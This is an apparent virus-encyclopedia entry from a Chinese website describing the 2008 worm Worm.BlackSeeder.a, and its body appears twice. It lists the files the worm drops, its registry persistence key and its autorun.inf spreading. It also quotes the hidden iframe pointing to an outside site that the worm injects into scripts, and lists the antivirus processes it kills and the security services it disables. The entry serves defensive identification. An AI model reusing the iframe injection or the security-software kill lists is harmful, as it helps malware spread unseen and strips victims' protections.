| 導購 | 订阅 | 在线投稿
分享
 
 
 

Worm.BlackSeeder.a

2008-08-14 22:52:50  編輯來源:互聯網  简体版  手機版  移動版  評論  字體: ||
 

病毒名稱(中文):

病毒別名:

威脅級別:

★☆☆☆☆

病毒類型:

蠕蟲病毒

病毒長度:

708096

影響系統:

Win9xWinMeWinNTWin2000WinXPWin2003

病毒行爲:

這是一個感染型病毒。會感染可執行文件和腳本文件。

1、生成的文件

%DOCUME~1%\ADMINI~1\LOCALS~1\Temp\BLACKSEEDER1.1

%SystemRoot%\DownloadedProgramFiles\0005486A.exe

%SystemRoot%\DownloadedProgramFiles\0005486A.DAT

2、添加啓動項

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

"MSLOGON"="C:\WINNT\DownloadedProgramFiles\0005486A.exe"

3、在個盤下生成autorun.inf啓動,並設置文件屬性爲隱藏。

%X:%\0005486A.exe

%X:%\autorun.inf

4、感染腳本,在腳本末添加

%iframesrc=http://www.wangzheqiaodan.com/girl/picture.***width=0height=0%%/iframe%

5、感染可執行文件,修改原文件入口,在原文件加名爲BSDR1.1的節。

6、不斷的讀軟區,發現沒軟盤會不斷的彈沒軟盤的錯誤提示。

7、結束下列進程

mcshield.exe

vstskmgr.exe

naprdmgr.exe

aterui.exe

tbmon.exe

scan32.exe

ravmond.exe

ccenter.exe

ravtask.exe

rav.exe

ravmon.exe

ravmond.exe

ravstub.exe

kvxp.kxp

kvmonxp.kxp

kvcenter.kxp

kvsrvxp.exe

kregex.exe

uihost.exe

trojdie.kxp

frogagent.exe

360Safe.exe

AST.exe

8、修改下列服務,禁止啓動運行

kavsvc

AVP

AVPkavsvc

McAfeeFramework

McShield

McTaskManager

McAfeeFrameworkMcShield

McTaskManager

navapsvc

KVWSC

KVSrvXP

Schedule

sharedaccess

RsCCenter

RsRavMon

RsCCenter

RsRavMon

wscsvc

KPfwSvc

SNDSrvc

ccProxy

ccEvtMgr

ccSetMgr

SPBBCSvc

Symantec

CoreLC

NPFMntor

MskService

FireSvc

Alerter

 
病毒名稱(中文): 病毒別名: 威脅級別: ★☆☆☆☆ 病毒類型: 蠕蟲病毒 病毒長度: 708096 影響系統: Win9xWinMeWinNTWin2000WinXPWin2003 病毒行爲: 這是一個感染型病毒。會感染可執行文件和腳本文件。 1、生成的文件 %DOCUME~1%\ADMINI~1\LOCALS~1\Temp\BLACKSEEDER1.1 %SystemRoot%\DownloadedProgramFiles\0005486A.exe %SystemRoot%\DownloadedProgramFiles\0005486A.DAT 2、添加啓動項 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "MSLOGON"="C:\WINNT\DownloadedProgramFiles\0005486A.exe" 3、在個盤下生成autorun.inf啓動,並設置文件屬性爲隱藏。 %X:%\0005486A.exe %X:%\autorun.inf 4、感染腳本,在腳本末添加 %iframesrc=http://www.wangzheqiaodan.com/girl/picture.***width=0height=0%%/iframe% 5、感染可執行文件,修改原文件入口,在原文件加名爲BSDR1.1的節。 6、不斷的讀軟區,發現沒軟盤會不斷的彈沒軟盤的錯誤提示。 7、結束下列進程 mcshield.exe vstskmgr.exe naprdmgr.exe aterui.exe tbmon.exe scan32.exe ravmond.exe ccenter.exe ravtask.exe rav.exe ravmon.exe ravmond.exe ravstub.exe kvxp.kxp kvmonxp.kxp kvcenter.kxp kvsrvxp.exe kregex.exe uihost.exe trojdie.kxp frogagent.exe 360Safe.exe AST.exe 8、修改下列服務,禁止啓動運行 kavsvc AVP AVPkavsvc McAfeeFramework McShield McTaskManager McAfeeFrameworkMcShield McTaskManager navapsvc KVWSC KVSrvXP Schedule sharedaccess RsCCenter RsRavMon RsCCenter RsRavMon wscsvc KPfwSvc SNDSrvc ccProxy ccEvtMgr ccSetMgr SPBBCSvc Symantec CoreLC NPFMntor MskService FireSvc Alerter
󰈣󰈤
王朝萬家燈火計劃
期待原創作者加盟
 
 
 
>>返回首頁<<
 
 
 
 
 熱帖排行
 
王朝網路微信公眾號
微信掃碼關註本站公眾號 wangchaonetcn
 
 
靜靜地坐在廢墟上,四周的荒凉一望無際,忽然覺得,淒涼也很美
© 2005- 王朝網路 版權所有